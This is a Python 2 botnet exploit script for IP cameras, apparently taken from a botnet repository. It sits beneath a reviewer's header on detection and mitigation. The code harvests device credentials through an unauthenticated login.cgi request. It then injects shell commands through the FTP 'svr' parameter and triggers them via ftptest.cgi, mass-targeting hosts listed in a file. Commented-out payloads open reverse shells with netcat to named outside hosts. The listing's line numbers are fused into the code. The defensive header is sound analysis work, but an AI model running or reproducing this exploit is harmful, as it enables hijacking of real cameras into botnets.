Path: blob/master/Botnets/Exploits/R4IX/[_python_]_r4ix_3.py
# NOTE(review): this listing was extracted with its line-number gutter fused
# into the code (e.g. "import socket1import sys2") and its indentation lost,
# so it does not parse as shown. The syntax is Python 2 (print statements).
#
# What the visible code does:
# - retrieve_credentials(): sends "GET login.cgi HTTP/1.0" with no
#   authentication and parses the text after "var login" in the reply into
#   "username:password"; every failure path returns 0.
# - run(): places those values in loginuse/loginpas on /set_ftp.cgi and sets
#   the FTP "svr" field to %24%28 ... %29 (URL-encoded "$(" ... ")") around
#   each line read from a local file named "file", then requests
#   /ftptest.cgi. Presumably the device hands "svr" to a shell when the FTP
#   test runs -- confirm against the firmware.
# - submit_payload2(): polls the reply for "ok" until time.clock() has
#   advanced by 30.
# - __main__: reads targets from a file named "goahead", keeps only the part
#   before ":" and always uses port 81, starting one Process per line with no
#   limit and no join.
#
# Detection (derived from the request strings below):
# - a request line "GET login.cgi" with no leading "/", HTTP/1.0, terminated
#   by bare "\n\n" and carrying no headers;
# - "/set_ftp.cgi" requests whose svr parameter contains "%24%28" (or "$("),
#   followed by "/ftptest.cgi" from the same source address;
# - the commented-out payloads name nexusiotsolutions.net and 37.48.99.233,
#   TCP port 1234, as callback hosts; treat them as indicators from this
#   sample only.
#
# Mitigation:
# - keep the camera web interface (TCP 81 here) unreachable from untrusted
#   networks and apply vendor firmware where available;
# - change credentials on any device that answered login.cgi, since the
#   reply exposes them in clear text;
# - restrict outbound connections from the camera network segment so an
#   injected command cannot call back.
import socket1import sys2import re3import time4from multiprocessing import Process56def retrieve_credentials(host, port):7sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)8try:9sock.settimeout(5)10sock.connect((host, int(port)))11except:12sock.close()13return 014# Retrieved credentials15try:16sock.send("GET login.cgi HTTP/1.0\n\n")17resp = sock.recv(1024)18# Double receive19resp += sock.recv(1024)20except:21sock.close()22return 023if not resp:24sock.close()25return 026index = resp.find("var login")27done = resp[index:]28m = done.strip("\r\n")29l = m.split(" ")30if len(l) <= 1:31sock.close()32return 033try:34preuser = l[1].strip("var \r\n")35prepass = l[2].strip("var \r\n")36except:37return 038username = preuser[11:].strip('";')39password = prepass[11:].strip('";')40sock.close()41return username + ":" + password4243def submit_payload(host, port, payload):44sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)45try:46sock.settimeout(5)47sock.connect((host, int(port)))48except:49sock.close()50return 051try:52sock.send(payload)53except:54sock.close()55return 056sock.close()57return 15859def submit_payload2(host, port, payload):60sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)61try:62sock.settimeout(5)63sock.connect((host, int(port)))64except:65sock.close()66return 067try:68sock.send(payload)69except:70sock.close()71return 072now = time.clock()73while (time.clock() - now) < 30:74try:75resp = sock.recv(1024)76except:77break78if not resp:79break80if "ok" in resp:81sock.close()82return 183sock.close()84return 08586def run(host, port):87ret = retrieve_credentials(host, port)88if ret == 0:89return90str = ret.split(":")91username = str[0]92password = str[1]93if username != "" and password != "":94print "Retrieved credentials %s:%s" % (str[0], str[1])95else:96return97# Continue assuming we've retrieved the credentials successfully98#payload = "GET /set_ftp.cgi?loginuse=" + username + "&loginpas=" + password + 
"&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+nexusiotsolutions.net+1234+-e+%2Fbin%2Fsh%29 HTTP/1.0\n\n"99for i in open("file", "r").readlines():100line = i.strip("\r\n")101payload = "GET /set_ftp.cgi?loginuse=" + username + "&loginpas=" + password + "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28" + line + "%29 HTTP/1.0\n\n"102ret = submit_payload(host, port, payload)103if ret == 0:104print "failed to send payload - %s (timeout?)" % (host)105return106payload2 = "GET /ftptest.cgi?loginuse=%s&loginpas=%s HTTP/1.0\n\n" % (username, password)107ret = submit_payload2(host, port, payload2)108if ret == 0:109print "failed to send payload - %s (timeout?)" % (host)110return111"""payload = "GET /set_ftp.cgi?loginuse=" + username + "&loginpas=" + password + "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+37.48.99.233+1234+-e+%2Fbin%2Fsh%29 HTTP/1.0\n\n"112ret = submit_payload(host, port, payload)113if ret == 0:114print "Failed to send initial payload"115return116print "Sent initial payload, building & preparing to send the second"117payload2 = "GET /ftptest.cgi?loginuse=%s&loginpas=%s HTTP/1.0\n\n" % (username, password)118ret = submit_payload2(host, port, payload2)119if ret == 0:120print "Failed to send submit payload"121return"""122123if __name__ == "__main__":124for i in open("goahead", "r").readlines():125line = i.strip("\r\n")126info = line.split(":")127ip = info[0]128port = 81129p = Process(target=run, args=(ip,port,))130p.start()131132